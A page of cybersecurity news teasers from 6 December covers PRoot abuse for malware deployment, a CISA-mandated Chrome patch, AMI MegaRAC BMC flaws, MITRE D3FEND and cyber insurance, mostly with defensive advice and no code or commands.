CyberSecurity Updates

06 Dec

Threat Actors Abuse PRoot Linux Utility to Simplify Malware Deployment

Attacks, Malware

Threat actors observed using this technique have been able to utilize free file sharing services like Google Drive, Dropbox, or OneDrive to host their compressed filesystem containing their malware, making them readily accessible from victim devices. Organizations should be sure to monitor for connections to these file sharing services, especially ones that are not commonly used for an organization’s business processes.Organizations may also find it useful to monitor for the execution of the PRoot tool,…

Read More
06 Dec

CISA Order Agencies to Patch Google Chrome Vulnerability

Attacks, Malware

This is the ninth high severity bug for which Chrome has released a patch during 2022. CISA has given three weeks to its agencies to patch their systems. Because of this timeline, it is likely we will not see technical details of this vulnerability until after this date. It is highly recommended that any organization with users running Google Chrome should use CISA’s requirements as a guideline for themselves, and endeavor to have all systems…

Read More
06 Dec

Three BMC Vulnerabilities Impact Manufacturers Industrywide

Attacks, Malware

Much of the risk of these vulnerabilities can be mitigated by controlling access to remote management interfaces. Companies should endeavor to never leave these exposed to the internet, and further limit which devices or networks can access these interfaces. User behavior analysis can help identify exploitation of vulnerabilities like these; mass password reset requests and root-level activities that differ from baseline can be reliable indicators of a compromise. https://thehackernews.com/2022/12/new-bmc-supply-chain-vulnerabilities.html

Read More
06 Dec

Three Ways to Improve Defense Readiness Using MITRE D3FEND

Information, News

Created and maintained by MITRE, MITRE D3FEND is a framework that provides a library of defensive cybersecurity countermeasures and technical components to help organizations improve their defensive cybersecurity posture. MITRE D3FEND is complementary to the MITRE ATT&CK framework, which is a library of cybercriminal tactics, techniques, and procedures (TTP). D3FEND maps relationships between ATT&CK’s TTP and defensive countermeasures for developing strategies to known attacker behavior. Using D3FEND To Bolster Defensive Readiness D3FEND gives organizations a…

Read More
06 Dec

Flaws in MegaRAC baseband management firmware impact many server brands

Data Breaches, Malware, Social Engineering

Researchers have found three vulnerabilities in AMI MegaRAC, a baseband management controller (BMC) firmware used by multiple server manufacturers. If exploited, the flaws could allow attackers to remotely control servers, deploy malware and firmware implants, or trigger damaging actions that leave them inoperable. BMCs are microcontrollers present on server motherboards that have their own firmware, dedicated memory, power, and network ports and are used for out-of-band management of servers when their main operating systems are…

Read More
06 Dec

Action1 launches threat actor filtering to block remote management platform abuse

Data Breaches, Malware, Social Engineering

Action1 has announced new AI-based threat actor filtering to detect and block abuse of its remote management platform. The cloud-native patch management, remote access, and remote monitoring and management (RMM) firm stated its platform has been upgraded to spot abnormal user behavior and automatically block threat actors to prevent attackers exploiting its tool to carry out malicious activity. The release comes amid a trend of hackers misusing legitimate systems management platforms to deploy ransomware or…

Read More
06 Dec

The global state of the cyber security industry 2022

Attacks, Data Breaches

Introduction to cyber security in 2022 Cyber security is central to operational success Cyber security practitioners entered 2022 under the shadow of the Log4Shell vulnerability. The vulnerability sent shockwaves throughout the cyber security world and has continued to be used by threat actors. Just months into 2022, statements from government organizations such as the Cybersecurity and Infrastructure Security Agency (CISA) in the US and the UK’s National Cyber Security Centre (NCSC) called on organizations, especially…

Read More
06 Dec

Tractors vs. threat actors: How to hack a farm

Information

Forget pests for a minute. Modern farms also face another – and more insidious – breed of threat. While I was in the UK police force and part of the National Cyber Crime Unit in 2018, I was asked to give a talk on cybersecurity at a National Farmers’ Union (NFU) meeting in southern England. Right after I started my talk, one farmer immediately raised his hand and told me that his cows had recently…

Read More
06 Dec

Ping of death! FreeBSD fixes crashtastic bug in network tool

Information

by Paul Ducklin One of the first low-level network tools that any computer user learns about is the venerable ping utility. Named after the eponymous sound effect from any and every old-school war movie scene involving submarines, the command is a metaphorical echo (see what we did there?) of the underwater version of RADAR known as SONAR. You send out a p-i-n-g (more like a d-o-i-n-n-n-n-g noise, in reality) into the briny depths, and by…

Read More
06 Dec

What you should know when considering cyber insurance in 2023

Data Breaches, Malware, Social Engineering

As the frequency and severity of ransomware, phishing, and denial of service attacks has increased, so has demand for cyber insurance. About $6.5 billion in direct written premiums were recorded in 2021, a 61% increase over the prior year, according to an October 2022 memorandum from the National Association of Insurance Commissioners. “Some companies see it as essential to their risk management strategy,” says Heather Engel, managing partner at advisory firm Strategic Cyber Partners. However, experts say…

Read More